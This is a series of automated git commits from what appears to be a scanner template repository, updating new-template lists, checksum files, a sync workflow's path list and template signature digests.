http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 @@ -8581,7 +8582,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c57bb8f7de4b36023acff4442e06229729d6ebc9 +templates-checksum.txt:65550fbf71db804f6717770f1abaa9223f119a11 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d8055baf0e3733ed2fe0c29ee72cab58348a51c8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:58:34 +0000 Subject: [PATCH 1484/1768] Auto Generated New Template Addition List [Wed May 29 07:58:34 UTC 2024] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index 063d342aed..94d0064387 100644 --- a/.new-additions +++ b/.new-additions @@ -13,12 +13,15 @@ http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml +http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml +http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml +http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 2d55ff69f95d97930580a663f4e5826003b4d15e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:58:40 +0000 Subject: [PATCH 1485/1768] Auto Generated Templates Checksum [Wed May 29 07:58:40 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cfc7658464..8b9db4e433 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5517,6 +5517,7 @@ http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 +http/misconfiguration/installer/virtual-smartzone-installer.yaml:eb1595d8a2e010eb1afea3ce0c3469ddb2236066 http/misconfiguration/installer/vtiger-installer.yaml:0db9526b5e94e1948f72d13820bb49a346afee5c http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f338c6812b515033579 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f @@ -8582,7 +8583,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:65550fbf71db804f6717770f1abaa9223f119a11 +templates-checksum.txt:359bbf28bb63d74f59e8cd2d90a090fcc2f61e09 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 849b059ac033679ed27f573848d59ea18a6bbc86 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:58:41 +0000 Subject: [PATCH 1486/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ea6701ee60..5e8a1980cd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' + - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' From 865e558ed1f3587a277bde928406a2a5c0b80688 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:59:11 +0000 Subject: [PATCH 1487/1768] Auto Generated New Template Addition List [Wed May 29 07:59:11 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 94d0064387..87d2a683f8 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml +http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -19,6 +20,7 @@ http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml From 567c0f1697c85d1a6d188ab2d3c54cf2329af115 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:59:15 +0000 Subject: [PATCH 1488/1768] Auto Generated Templates Checksum [Wed May 29 07:59:15 UTC 2024] :robot: --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8b9db4e433..49445ec6c1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5393,6 +5393,7 @@ http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d6 http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff +http/misconfiguration/installer/activecollab-installer.yaml:36c1b4c95e44199ea20bc210c89205f8bef1cf2b http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a @@ -5467,6 +5468,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 +http/misconfiguration/installer/onlyoffice-installer.yaml:99ef19f5fdfb28ae627eaba3740df383b80b0550 http/misconfiguration/installer/openemr-setup-installer.yaml:3492aff559423b20f44da10634d6bbf53a426871 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc @@ -5488,6 +5490,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 +http/misconfiguration/installer/profittrailer-installer.yaml:234e41ef679963500411241f83a84f9f8f9facc5 http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 @@ -8583,7 +8586,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:359bbf28bb63d74f59e8cd2d90a090fcc2f61e09 +templates-checksum.txt:603a48ec1641792e0b75038a63d296610d4028b3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 49b2f7bdda6f36ad877c3cbb29ee17f7e2c52c55 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:59:20 +0000 Subject: [PATCH 1489/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5e8a1980cd..5f8b7b8774 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,12 +18,15 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' + - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' + - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' + - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 6bd73cc13f9abda8fd748a7a5af9135ff1fe1613 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:59:38 +0000 Subject: [PATCH 1491/1768] Auto Template Signing [Wed May 29 07:59:38 UTC 2024] :robot: --- http/default-logins/ampjuke-default-login.yaml | 1 + http/exposed-panels/busybox-repository-browser.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml index 125086f0a2..7cba568c40 100644 --- a/http/default-logins/ampjuke-default-login.yaml +++ b/http/default-logins/ampjuke-default-login.yaml @@ -59,3 +59,4 @@ http: regex: - 'name="uuid" value="([./a-z0-9-]+)">' internal: true +# digest: 490a0046304402201cc8ef1362131ffb99ceea9b2bd251961020c1a7d095a8588a269fff0b6bb66402205a78622f15123331eb83ca7cc6db264f141cf762eceaedbd64d3ccdb5b952b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index c1a5b6144e..3c9139c8e6 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100b22d49b77ae4a717d7e7bf4f90d59dd65306501adfe35f406cb7a666fb2ed05e022100b2a44a153e2fc81a920d6e89e4a879794531bffd514ff590fddc038237226b33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 69a425adecb5e434250bb21246fb4fbadd5ea528 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:00:01 +0000 Subject: [PATCH 1492/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5f8b7b8774..8b16a590aa 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' + - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' @@ -24,6 +25,7 @@ on: - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' From 698e8ba89c5e9a3eddea89ea08a67ef2d28c859f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:00:11 +0000 Subject: [PATCH 1493/1768] Auto Generated New Template Addition List [Wed May 29 08:00:11 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 87d2a683f8..d26ee86c90 100644 --- a/.new-additions +++ b/.new-additions @@ -18,11 +18,13 @@ http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml +http/misconfiguration/installer/glpi-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml +http/misconfiguration/installer/tastyigniter-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From 3d85c3b4dc2b94bb384649a89645ba36f0352226 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:00:16 +0000 Subject: [PATCH 1494/1768] Auto Generated Templates Checksum [Wed May 29 08:00:16 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49445ec6c1..e643c865ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3308,6 +3308,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-3495.yaml:060d2ed065c0100e109bbe6f050daabaa92b64db http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 @@ -3325,7 +3326,7 @@ http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc http/default-logins/allnet/allnet-default-login.yaml:bdc1b0fae7b08909a071f9b452800f8b37b4b2ea http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe -http/default-logins/ampjuke-default-login.yaml:dcd5fb3f7636832265548e0ab1c8d4dba89a11a4 +http/default-logins/ampjuke-default-login.yaml:5e1655762197af52d69e68706d186e6043549f2c http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 @@ -3631,7 +3632,7 @@ http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e8 http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 -http/exposed-panels/busybox-repository-browser.yaml:fedbe7dab622d91bf01cf75e62d0a9637d975736 +http/exposed-panels/busybox-repository-browser.yaml:39ae82f90249996e5c2d4fcb342cbcc033ddf8b0 http/exposed-panels/bynder-panel.yaml:6cb1f105a7d932e3123174ce57392fd0e4238a9d http/exposed-panels/c2/ares-rat-c2.yaml:1aac3bf878b995e385e7543bf774dd43c1c9a498 http/exposed-panels/c2/brute-ratel-c4.yaml:f2c6438699c51caca084e6ceddebfc4caf1414e2 @@ -5437,6 +5438,7 @@ http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44 http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e +http/misconfiguration/installer/glpi-installer.yaml:7f389d140c85cf0335612ea2e2057de050230746 http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa @@ -8586,7 +8588,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:603a48ec1641792e0b75038a63d296610d4028b3 +templates-checksum.txt:b74a4a853bcdd22045ca7915f9b478574c01f88c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 30877c407e1fc9862cca609591713927e480622c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:00:30 +0000 Subject: [PATCH 1495/1768] Auto Generated New Template Addition List [Wed May 29 08:00:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d26ee86c90..038fc0cfd4 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/stackposts-installer.yaml http/misconfiguration/installer/tastyigniter-installer.yaml +http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From 923d4ad63cc87e36d93ca0fa0388a5d58180ee49 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:00:49 +0000 Subject: [PATCH 1496/1768] Auto Generated Templates Checksum [Wed May 29 08:00:49 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e643c865ce..d86afa27eb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5512,6 +5512,7 @@ http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcf http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f773aa565679bd65 +http/misconfiguration/installer/tastyigniter-installer.yaml:24ae629a775107fe9bcc658e1377f483f864c4a9 http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 @@ -5520,6 +5521,7 @@ http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e +http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:9100af130cdecc1b9e7ac7c7201684997e51a037 http/misconfiguration/installer/uvdesk-install.yaml:e09e2da072d150ee5a8ad20f68a16d026cd20837 http/misconfiguration/installer/vironeer-installer.yaml:bbb96915ddb6312c37d73639468ac9454873e277 http/misconfiguration/installer/virtual-smartzone-installer.yaml:eb1595d8a2e010eb1afea3ce0c3469ddb2236066 @@ -8588,7 +8590,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b74a4a853bcdd22045ca7915f9b478574c01f88c +templates-checksum.txt:b9be7ce4b854e5573731b727c6a03d1e00b42321 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f5f892d7d7d0d0ba93829b76936208e618d54381 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:01:05 +0000 Subject: [PATCH 1497/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8b16a590aa..b2ce32abd4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,11 +23,13 @@ on: - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' + - 'http/misconfiguration/installer/glpi-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/stackposts-installer.yaml' + - 'http/misconfiguration/installer/tastyigniter-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From f1349aebb812927a9da39c765d53db4e42e76d11 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:01:31 +0000 Subject: [PATCH 1498/1768] Auto Generated Templates Checksum [Wed May 29 08:01:31 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d86afa27eb..6697917805 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5425,6 +5425,7 @@ http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 +http/misconfiguration/installer/ejbca-enterprise-installer.yaml:c7a7e5fcbedd43a6ca347ae9acba4579fdb1ed24 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a @@ -5445,6 +5446,7 @@ http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0 http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc +http/misconfiguration/installer/invicti-enterprise-installer.yaml:51eab6643b190341bccd5bfb787b27bfcbf36e71 http/misconfiguration/installer/jira-setup.yaml:dd2b7c8705de134a0832d31e71627a28afd37e14 http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5ce5cbed4bfb17a http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 @@ -8590,7 +8592,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b9be7ce4b854e5573731b727c6a03d1e00b42321 +templates-checksum.txt:e63cdb2330891dc01a81e7bbef7753c3694aa57a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6ccc0a118b25c237eb27a36e83575cd9e488fff6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:01:44 +0000 Subject: [PATCH 1499/1768] Auto Generated New Template Addition List [Wed May 29 08:01:44 UTC 2024] :robot: --- .new-additions | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.new-additions b/.new-additions index 038fc0cfd4..0ba334f7b6 100644 --- a/.new-additions +++ b/.new-additions @@ -16,9 +16,13 @@ http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml +http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/glpi-installer.yaml +http/misconfiguration/installer/invicti-enterprise-installer.yaml +http/misconfiguration/installer/invoice-ninja-installer.yaml +http/misconfiguration/installer/jfa-go-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml From 420b5c9ae3b55b08a3f05ca3a4c72df5a080fb58 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:02:03 +0000 Subject: [PATCH 1501/1768] Auto Template Signing [Wed May 29 08:02:03 UTC 2024] :robot: --- 